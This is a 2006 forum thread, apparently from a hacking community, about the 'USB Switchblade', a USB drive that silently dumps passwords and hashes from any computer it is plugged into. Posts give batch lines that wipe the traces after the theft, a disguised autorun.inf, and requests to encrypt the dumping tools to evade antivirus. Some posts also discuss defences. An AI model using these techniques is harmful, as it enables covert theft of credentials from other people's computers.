marc Posted September 21, 2006 Share Posted September 21, 2006 (offtopic, hows your finger?) Quote Link to comment Share on other sites More sharing options...
Irving Washington Posted September 21, 2006 Share Posted September 21, 2006 This is all for non U3 versions - it may be applicable to U3, but as I don't have it, I won't speculate... I've tried Silivrenion's version of the Switchblade, and have added the following to the batch file: if not exist "Removable Disk" md "Removable Disk" >nul Start explorer.exe "Removable Disk This is a slight improvement in that it: a) Does something after trying to open the USB drive b) opens into a folder other than the one containing all the dodgy stuff ;) You can obviously change this to do what you like. Bearing in mind that it's a 'SocEng' (wetware) exploit to get someone to run the code, opening a folder that has a load of .exes, or hidden folders/files, batch files, or a combination is going to worry people somewhat. So the initial fix is to open a new folder that doesn't contain all the naughty stuff. I'm working on 2 vastly superior versions of this - will post once done Quote Link to comment Share on other sites More sharing options...
Irving Washington Posted September 21, 2006 Share Posted September 21, 2006 Irving Washington's One Time Version This is an updated version of Silivrenion's Technique, which uses a modified batch file to remove evidence of the steal and launch Explorer.exe following the data theft. This means the USB key can only be used once before needing 'priming' again, but has the benefits of appearing as though nothing has happened (other than a slightly slow Explorer launch). Mods to Siliv's version are as follows: Add the following to switchblade.bat before :End cd .... DEL /f /q nircmd.exe > nul DEL /f /q autorun.inf > nul RMDIR /s /q WIP > nul Start explorer.exe . DEL /f /q switchblade.bat >nul If you want, you can use the ATTRIB command to hide the logfile(s), but be warned that people like myself who enable the 'show hidden files' view will still see these files and be intrigued... Quote Link to comment Share on other sites More sharing options...
marc Posted September 21, 2006 Share Posted September 21, 2006 Damn this works well. I edited the autorun.inf file (on the amish/non-u3 version) to make it more realistic: [autorun] action=Open folder to view files icon=iconsfolder.ico shellexecute=nircmd.exe execmd CALL batexeprogstart.bat Quote Link to comment Share on other sites More sharing options...
marc Posted September 21, 2006 Share Posted September 21, 2006 Sorry for double post, but I just have something involving morals to say. I believe that learning this can help ourselves for antivirus protection. Our knowledge on the tricks used by viruses can only expand, such as that social trick on Amish's version, or the U3 CD partition. No longer will I feel safe that by inserting a USB drive into my PC, nothing will execute unless I double click on what I want. AV's should realise that we do want to learn about this stuff. It is very useful to know. Besides, how can an AV block a social trick in autorun.inf? There are somethings we NEED to know about. Quote Link to comment Share on other sites More sharing options...
Silva Posted September 21, 2006 Share Posted September 21, 2006 Sorry for double post, but I just have something involving morals to say.I believe that learning this can help ourselves for antivirus protection. Our knowledge on the tricks used by viruses can only expand, such as that social trick on Amish's version, or the U3 CD partition. No longer will I feel safe that by inserting a USB drive into my PC, nothing will execute unless I double click on what I want. AV's should realise that we do want to learn about this stuff. It is very useful to know. Besides, how can an AV block a social trick in autorun.inf? There are somethings we NEED to know about. You could just disable autorun like most of the people I know(they disable it because they hate the annoying pop up when they put in cd's ) and you'll be completly safe from this attack, and norton AV 2003 does ask if you want to run the program from the remvoable media object(something along those lines) if you use the non u3 way. Quote Link to comment Share on other sites More sharing options...
marc Posted September 21, 2006 Share Posted September 21, 2006 Absolutely Silva, but I am talking about the general knowledge you can get from this. Who would expect a flash disk to have a CD partition? I know some people just use common sense instead of any real AV, but very little can be trusted. Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted September 21, 2006 Author Share Posted September 21, 2006 Sorry for double post, but I just have something involving morals to say.I believe that learning this can help ourselves for antivirus protection. Our knowledge on the tricks used by viruses can only expand, such as that social trick on Amish's version, or the U3 CD partition. No longer will I feel safe that by inserting a USB drive into my PC, nothing will execute unless I double click on what I want. AV's should realise that we do want to learn about this stuff. It is very useful to know. Besides, how can an AV block a social trick in autorun.inf? There are somethings we NEED to know about. Since USB Keys went mainstream I've always been weary of the autorun threat, so much so that I've made it habit to hold the shift key while inserting any untrusted media. Quote Link to comment Share on other sites More sharing options...
moonlit Posted September 21, 2006 Share Posted September 21, 2006 It seems that this doesn't work on Windows 2003 (or at least doesn't with the tests I've tried with autorun.inf on USB devices) but yeah, it's always a good idea to be careful with untrusted media... Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted September 21, 2006 Author Share Posted September 21, 2006 Sorry for the double post but two quick things: 1. Staples is having a sale on the U3 enabled Sandisk Cruzer Micro drives. I picked up a 512 MB in store for $14.99. The 1 GB is about $25 and the 2 GB is about $45. The sale works both online and in-store and is good until September 23rd (this Saturday). Now that I've got two I can have a leathal and non-leathal USB drive on my keychain. 2. I just got off the phone with the Sr. Editor of a well known computer magazine in the US. They will be printing a story about the USB Switchblade on their website some time tomorrow (I'll provide a link when it's live), and possibly on next week's print edition of the magazine. Way to go everyone who's contributed, this project is totally rocking! I feel like we're actually bringing awareness to both regular users and IT pros about these attack vectors. Hopefully the editor will say something nice about us. Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted September 21, 2006 Author Share Posted September 21, 2006 It seems that this doesn't work on Windows 2003 (or at least doesn't with the tests I've tried with autorun.inf on USB devices) but yeah, it's always a good idea to be careful with untrusted media... Amish or MaxDamage technique? Quote Link to comment Share on other sites More sharing options...
renegadecanuck Posted September 21, 2006 Share Posted September 21, 2006 Sorry if it's a double post, but the I keep getting " Logon to 127.0.0.1ADMIN$ failed: code 64" for SAM dump. Quote Link to comment Share on other sites More sharing options...
marc Posted September 21, 2006 Share Posted September 21, 2006 I'm thinking of buying a U3 device. Is it worth it? Or perhaps stick with the non-u3 version? Is U3 worth it just for the real U3 technology, i.e. out of the box? I might get a cruzer 1gb. Quote Link to comment Share on other sites More sharing options...
johnsrobotics Posted September 21, 2006 Share Posted September 21, 2006 I can't seem to find those prices...I found the 2GB for $90 http://www.circuitcity.com/ssm/SanDisk-Cru...roductDetail.do I do see a 1GB for $45...unless someone can point me to a 2GB for $45, I'll just go with 2 512MB drives for $40 I need to get one for general use anyways, as I don't even pwn one yet. Quote Link to comment Share on other sites More sharing options...
moonlit Posted September 21, 2006 Share Posted September 21, 2006 It seems that this doesn't work on Windows 2003 (or at least doesn't with the tests I've tried with autorun.inf on USB devices) but yeah, it's always a good idea to be careful with untrusted media... Amish or MaxDamage technique? Neither, though it would've been Amish's technique... I tried with a DIY autorun.inf with Notepad as the app to run and an app I think was called Ceedo which uses autorun to open a menu when you insert the device... I did have the idea of using an MP3 player or a digital camera to store the stuff on for Amish's method because that'd look even less conspicuous, who's gonna suspect a digicam? I didn't get a chance to test that though since as I say it failed on Win2k3 and I don't have an XP box right now (thinking I should use a VM for testing stuff like this) Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted September 21, 2006 Author Share Posted September 21, 2006 I can't seem to find those prices...I found the 2GB for $90I do see a 1GB for $45...unless someone can point me to a 2GB for $45, I'll just go with 2 512MB drives for $40 I need to get one for general use anyways, as I don't even pwn one yet. $15 512MB $25 1GB $45 2GB Those links are from the Staples store in my area (Williamsburg, VA). AFAIK it's nation wide. I picked up a 512 MB for $15 today in Vienna, VA in store at that sale price. Sale ends on the 23rd. We're not affiliated with Sandisk or Staples, but it's a damn good deal. Both the U3 method and Amish method work great. I think Amish made clever use of some social engineering, but personally I'm a bit more fond of the U3 technique since it doesn't require any key presses/mouse clicks. (No offence Amish) Quote Link to comment Share on other sites More sharing options...
johnsrobotics Posted September 22, 2006 Share Posted September 22, 2006 Awesome. Picked up 2 2GBers Thanks! Quote Link to comment Share on other sites More sharing options...
renegadecanuck Posted September 22, 2006 Share Posted September 22, 2006 Sorry if it's a double post, but the I keep getting "Logon to 127.0.0.1ADMIN$ failed: code 64" for SAM dump. Hmm, I can get it to work on other cocmputers apparently, just not on my test computer... Quote Link to comment Share on other sites More sharing options...
Irving Washington Posted September 22, 2006 Share Posted September 22, 2006 Another use for this could be a useful security device for you. If you can set the autorun to clean history, close encrypted shares etc., it's a lot easier than remembering / installing routines /applications to do this - basically it could mean that you can wipe traces from any machine you use... Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted September 22, 2006 Author Share Posted September 22, 2006 Another use for this could be a useful security device for you. If you can set the autorun to clean history, close encrypted shares etc., it's a lot easier than remembering / installing routines /applications to do this - basically it could mean that you can wipe traces from any machine you use... Remember in episode 1x02 or 1x03 the windows firewall automation script? My goal was to make changes to several windows firewalls without the use of group policies, so I'd have to physically go to each machine. While the script wasn't malicious in nature it used the same technique as Amish's hack to run my firewall script. The same could be done with U3. I could see it being used for white hat purposes such as installing updates, latest anti-virus definitions, testing for security best practices. But then again by the time that the automation part makes it actually start to break even in time spent administrating each machine you're probably already in a domain environment with enough flexability with the clients that this could all be automated from the server anyway. Ahh, thinking out loud again. Quote Link to comment Share on other sites More sharing options...
Irving Washington Posted September 22, 2006 Share Posted September 22, 2006 Agreed, from the point of view of administering a number of machines it's impractical, but from the point of view of you using machines in public places, schools, libraries, etc., it could be useful for cleaning up after yourself... Quote Link to comment Share on other sites More sharing options...
flick650 Posted September 22, 2006 Share Posted September 22, 2006 Hi renegadecanuck I posted a fix for your problem a couple of pages back. The problem is with PWDUMP, go and get the latest version and replace the version on your key. It works perfectly after. Quote Link to comment Share on other sites More sharing options...
flick650 Posted September 22, 2006 Share Posted September 22, 2006 Sorry for the second post but has anybody else seen the story that is floating around digg.com at the moment. http://passivemode.net/updates/2006/6/5/wi...on-exploit.html It allows you to get admin using just the AT command. I am working on integrating it into my USB key, i will let you know the results. Unfortunatley it does mean the key has to be in there for about a minute and a half but it might help. Quote Link to comment Share on other sites More sharing options...
Sloth Posted September 22, 2006 Share Posted September 22, 2006 Sorry for the second post but has anybody else seen the story that is floating around digg.com at the moment. http://passivemode.net/updates/2006/6/5/wi...on-exploit.html It allows you to get admin using just the AT command. I am working on integrating it into my USB key, i will let you know the results. Unfortunatley it does mean the key has to be in there for about a minute and a half but it might help. correct me if im wrong but i dont think this works the way you think it does. ok the only way i got this to work was by trying from admin account to escalate to system, this did not work to escalate from limited user to system. maybe i did something wrong but i think it was a proof of concept to get higher privlages than admin, not an actual escalation from limited to higher privlage. -Sloth Quote Link to comment Share on other sites More sharing options...
therian16 Posted September 22, 2006 Share Posted September 22, 2006 Great work on the project so far but we need a few more files encrypted. netpass.exe mspass.exe and the 6.0 version of pwdump would alternative to pwdump is fgdump. looks and sounds good but it needs to be encrypted before I can test it fully. thanks Brainkill Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.